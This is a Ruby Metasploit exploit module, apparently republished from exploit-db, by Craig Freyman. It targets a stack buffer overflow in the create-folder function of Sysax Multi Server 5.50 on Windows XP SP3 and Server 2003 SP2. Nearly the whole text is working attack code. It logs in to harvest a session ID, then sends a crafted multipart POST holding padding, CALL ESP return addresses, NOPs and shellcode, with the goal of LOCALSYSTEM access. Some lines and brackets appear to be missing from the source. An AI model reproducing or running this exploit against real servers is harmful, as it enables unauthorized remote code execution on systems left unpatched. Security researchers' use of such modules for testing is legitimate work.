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Sysax Multi Server 5.50 Create Folder Remote Code Exec BoF (MSF Module)
来源:www.exploit-db.com 作者:Freyman 发布时间:2012-02-01  
#Title: Sysax Multi Server 5.50 Create Folder Remote Code Exec BoF (MSF Module)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Notes: My original exploit => http://www.exploit-db.com/exploits/18382/
#did not automate the SID gathering process, but this one does. Thanks to todb for the pointers.
require 'msf/core'
require 'base64'
class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpClient
 def initialize(info = {})
   'Name'  => 'Sysax Multi Server 5.50 Create Folder BoF',
   'Description' => %q{
     This module exploits a stack buffer overflow in the create folder function
     in Sysax Multi Server 5.50. This issue was fixed in 5.52.
     You must have valid credentials to trigger the vulnerability. Your credentials
     must also have the create folder permission and the HTTP option has to be enabled.
     This module will log into the server, get your a SID token and then proceed to exploit
     the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
     XP and 2003. My original exploit did not automate the SID gathering process.
   'License' => MSF_LICENSE,
   'Author' => 'Craig Freyman @cd1zz',
   'Version' => '$Revision:$',
   'References' =>
     [ 'URL', 'http://www.exploit-db.com/exploits/18382/' ],
     [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ],
   'DefaultOptions' =>
     'EXITFUNC' => 'process',
   'Platform' => 'win',
   'Payload' =>
     'BadChars' => "\x00\x2F",
   'Targets'  =>
     [ 'Windows XP SP3',
       'Ret'    => 0x7C8369F0, #7C8369F0 CALL ESP kernel32.dll
       'Offset' => 667
     [ 'Windows Server 2003 SP2',
       'Ret'    => 0x77E5F2DF, #77E5F2DF CALL ESP kernel32.dll
       'Offset' => 648
   'Privileged' => false,
   'DisclosureDate'=> 'January 15, 2012',
   'DefaultTarget' => 0))
     OptString.new('URI', [false, "URI for Multi Server", '/']),
     OptString.new('SysaxUSER', [ true, "Username" ]),
     OptString.new('SysaxPASS', [ true, "Password" ])
    ], self.class)
 def target_url
 def exploit
  user = datastore['SysaxUSER']
  pass = datastore['SysaxPASS']
  #base64 encode the credentials
  encodedcreds = Base64.encode64(user+"\x0a"+pass)
  creds = "fd="+encodedcreds
  # Login to get SID value
  print_status "Getting SID from #{target_url}"
  res = send_request_raw({
   'method'=> 'POST',
   'uri' => "#{target_url}/scgi?sid=0&pid=dologin",
   'data'  => creds
  #parse response for SID token
  sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
  print_status "Your " + sid.to_s
  buffer =  rand_text(target['Offset'])
  buffer << [target.ret].pack('V')
  buffer << make_nops(50)
  buffer << payload.encoded #max 1299 bytes
  #pwnag3 post data
  post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
  post_data << "Content-Length: 171\r\n\r\n"
  post_data << "-----------------------------1190753071675116720811342231\r\n"
  post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
  post_data << buffer+"\r\n"
  post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
  referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
   'uri'     => "/" + post_data,
   'version' => '1.1',
   'method'  => 'POST',
   'referer' => referer

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